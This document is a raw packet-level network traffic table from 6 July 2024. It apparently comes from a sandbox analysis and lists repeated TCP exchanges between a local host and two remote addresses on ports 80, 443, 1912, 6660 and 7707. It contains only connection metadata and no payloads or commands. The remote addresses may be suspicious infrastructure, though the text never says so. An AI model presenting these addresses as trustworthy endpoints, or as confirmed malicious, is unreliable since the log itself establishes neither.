Jul 6, 2024 13:27:55.142499924 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:55.142689943 CEST	49805	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:55.144263029 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:55.149116993 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:55.253380060 CEST	49806	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:55.258301020 CEST	80	49806	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:55.258519888 CEST	49806	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:55.258519888 CEST	49806	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:55.263664961 CEST	80	49806	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:55.263797998 CEST	49806	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:55.272844076 CEST	80	49806	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:55.327533007 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:55.328114033 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:55.334268093 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:55.512284040 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:55.513329029 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:55.518147945 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:55.696450949 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:55.744040966 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:56.015944004 CEST	80	49806	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.016248941 CEST	80	49806	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.016294956 CEST	49806	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.019768953 CEST	49806	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.128056049 CEST	49807	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.132956028 CEST	80	49807	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.133023024 CEST	49807	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.133136988 CEST	49807	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.137964964 CEST	80	49807	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.138015985 CEST	49807	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.139199018 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:56.142939091 CEST	80	49807	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.207185030 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:56.267985106 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:56.346257925 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:56.853563070 CEST	80	49807	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.853586912 CEST	80	49807	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.853892088 CEST	49807	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.859708071 CEST	49807	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.972417116 CEST	49808	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.977572918 CEST	80	49808	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.977950096 CEST	49808	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.977998018 CEST	49808	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.983828068 CEST	80	49808	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:56.983895063 CEST	49808	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:56.989963055 CEST	80	49808	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:57.796525002 CEST	80	49808	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:57.797216892 CEST	80	49808	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:57.797262907 CEST	49808	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:57.799808979 CEST	49808	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:57.909452915 CEST	49810	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:57.914349079 CEST	80	49810	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:57.914410114 CEST	49810	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:57.914474010 CEST	49810	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:57.919260025 CEST	80	49810	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:57.919308901 CEST	49810	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:57.924091101 CEST	80	49810	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:58.058420897 CEST	49801	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.058830976 CEST	49811	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.065737009 CEST	6660	49801	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:58.066190958 CEST	6660	49811	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:58.066248894 CEST	49811	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.066653967 CEST	49811	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.074075937 CEST	6660	49811	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:58.632778883 CEST	80	49810	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:58.632842064 CEST	80	49810	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:58.633054018 CEST	49810	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:58.642014980 CEST	49810	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:58.753261089 CEST	49812	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:58.758173943 CEST	80	49812	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:58.758425951 CEST	49812	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:58.758425951 CEST	49812	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:58.763427019 CEST	80	49812	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:58.764070988 CEST	49812	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:58.769011974 CEST	80	49812	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:58.968904018 CEST	49813	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.969825029 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.973805904 CEST	7707	49813	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:58.973989964 CEST	49813	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.974589109 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:58.974874973 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.974889040 CEST	49813	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:58.981513023 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:58.981558084 CEST	7707	49813	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:59.492866993 CEST	80	49812	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:59.493633032 CEST	80	49812	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:59.493789911 CEST	49812	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:59.497051001 CEST	49812	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:59.596851110 CEST	49814	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:59.602827072 CEST	80	49814	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:59.602910042 CEST	49814	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:59.602953911 CEST	49814	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:59.607933044 CEST	80	49814	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:59.607975006 CEST	49814	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:59.612845898 CEST	80	49814	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:59.622977972 CEST	7707	49813	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:59.623431921 CEST	49813	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:59.629252911 CEST	7707	49813	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:59.737649918 CEST	6660	49811	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:59.737711906 CEST	49811	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:00.546161890 CEST	49813	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:00.551698923 CEST	7707	49813	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:00.551774025 CEST	49813	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:00.556701899 CEST	7707	49813	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:00.874397993 CEST	7707	49813	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:00.874692917 CEST	49813	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:01.432348013 CEST	80	49814	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:01.442056894 CEST	49814	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:01.446180105 CEST	80	49814	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:01.446268082 CEST	49814	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:01.550153017 CEST	49815	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:01.557929993 CEST	80	49815	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:01.558139086 CEST	49815	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:01.558139086 CEST	49815	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:01.565731049 CEST	80	49815	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:01.565984011 CEST	49815	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:01.572859049 CEST	80	49815	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:01.896436930 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:01.901948929 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:01.902004957 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:01.907183886 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:02.220319986 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:02.274036884 CEST	80	49815	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:02.275706053 CEST	80	49815	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:02.275755882 CEST	49815	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:02.277806997 CEST	49815	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:02.309977055 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:02.362531900 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:02.394093037 CEST	49816	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:02.399324894 CEST	80	49816	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:02.399386883 CEST	49816	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:02.399445057 CEST	49816	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:02.404601097 CEST	80	49816	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:02.404653072 CEST	49816	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:02.410181046 CEST	80	49816	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:02.419677973 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:02.424485922 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:02.424534082 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:02.430684090 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:03.112416029 CEST	80	49816	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:03.115396023 CEST	80	49816	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:03.117763996 CEST	49816	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:03.154722929 CEST	49816	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:03.268754005 CEST	49817	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:03.273674965 CEST	80	49817	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:03.273937941 CEST	49817	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:03.274019957 CEST	49817	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:03.278862953 CEST	80	49817	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:03.278930902 CEST	49817	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:03.288068056 CEST	80	49817	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:03.977922916 CEST	80	49817	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:03.978369951 CEST	80	49817	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:03.978420019 CEST	49817	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:03.981595993 CEST	49817	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.096905947 CEST	49818	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.101749897 CEST	80	49818	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:04.101833105 CEST	49818	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.101862907 CEST	49818	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.106697083 CEST	80	49818	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:04.106735945 CEST	49818	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.111526966 CEST	80	49818	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:04.796577930 CEST	49811	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:04.797485113 CEST	49819	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:04.801702976 CEST	6660	49811	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:04.802328110 CEST	6660	49819	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:04.802428007 CEST	49819	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:04.802727938 CEST	49819	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:04.807557106 CEST	6660	49819	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:04.841696978 CEST	80	49818	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:04.841933966 CEST	80	49818	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:04.842067957 CEST	49818	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.845563889 CEST	49818	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.959752083 CEST	49820	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.964589119 CEST	80	49820	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:04.964754105 CEST	49820	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.964754105 CEST	49820	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.969541073 CEST	80	49820	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:04.971834898 CEST	49820	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:04.976632118 CEST	80	49820	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:06.142360926 CEST	80	49820	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:06.142524004 CEST	80	49820	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:06.142580986 CEST	49820	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:06.146646976 CEST	49820	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:06.253403902 CEST	49821	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:06.260152102 CEST	80	49821	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:06.260220051 CEST	49821	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:06.260272980 CEST	49821	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:06.265062094 CEST	80	49821	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:06.265111923 CEST	49821	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:06.270631075 CEST	80	49821	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:06.453684092 CEST	6660	49819	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:06.453757048 CEST	49819	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:06.950158119 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:06.950196028 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:06.950355053 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:06.988373041 CEST	49822	443	192.168.2.4	188.114.97.3
Jul 6, 2024 13:28:06.988390923 CEST	443	49822	188.114.97.3	192.168.2.4
Jul 6, 2024 13:28:07.275743008 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.275845051 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.275880098 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.275892973 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.275904894 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276006937 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276019096 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276017904 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276036978 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276057959 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276109934 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276139975 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276174068 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276185989 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276212931 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276240110 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276309013 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276355982 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276370049 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276381016 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276391983 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276408911 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276429892 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276448965 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276509047 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276566982 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276577950 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276596069 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276596069 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276627064 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276698112 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276710033 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276748896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276818037 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276829958 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276849031 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276937008 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276948929 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276959896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.276967049 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.276972055 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277003050 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277089119 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277102947 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277108908 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277132034 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277149916 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277160883 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277208090 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277281046 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277292013 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277302980 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277314901 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277328014 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277329922 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277355909 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277448893 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277520895 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277532101 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277553082 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277623892 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277637005 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277648926 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277648926 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277662992 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.277720928 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.277720928 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.280934095 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.280997992 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281011105 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281023979 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281035900 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281064987 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281086922 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281102896 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281115055 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281116009 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281198025 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281198025 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281295061 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281306982 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281356096 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281382084 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281394005 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281405926 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281423092 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281436920 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281527042 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281538963 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281550884 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281553030 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281574011 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281588078 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281606913 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281670094 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281681061 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281689882 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281691074 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281704903 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.281719923 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.281923056 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.286436081 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.286478043 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.286489964 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.286508083 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.286530018 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.286540985 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.286560059 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.289798021 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364022970 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364033937 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364044905 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364093065 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364106894 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364145994 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364156961 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364270926 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364274025 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364280939 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364291906 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364310980 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364335060 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364469051 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364484072 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364495993 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364499092 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364509106 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364538908 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364619970 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364645004 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364648104 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:07.364655972 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:07.364752054 CEST	49797	7707	192.168.2.4	94.232.249.204
